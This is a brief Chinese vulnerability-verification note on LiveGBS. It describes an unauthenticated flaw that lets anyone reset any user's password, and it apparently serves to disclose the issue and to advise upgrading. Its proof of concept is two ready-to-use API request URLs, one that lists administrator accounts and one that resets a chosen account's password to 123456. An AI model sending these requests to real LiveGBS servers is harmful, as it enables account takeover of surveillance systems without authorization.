漏洞验证-LiveGBS任意用户密码重置漏洞

一、漏洞描述

LiveGBS部分接口存在未授权访问漏洞，攻击者可以通过组合漏洞修改任意用户密码。

二、验证POC

查看管理员信息：http://XXXX/api/v1/user/list?q=&start=&limit=10&enable=&sort=CreatedAt&order=desc

根据管理员信息修改密码：http://XXXX/api/v1/user/resetpassword?id=46&password=123456

三、验证截图

四、整改建议

联系官方升级至最新版本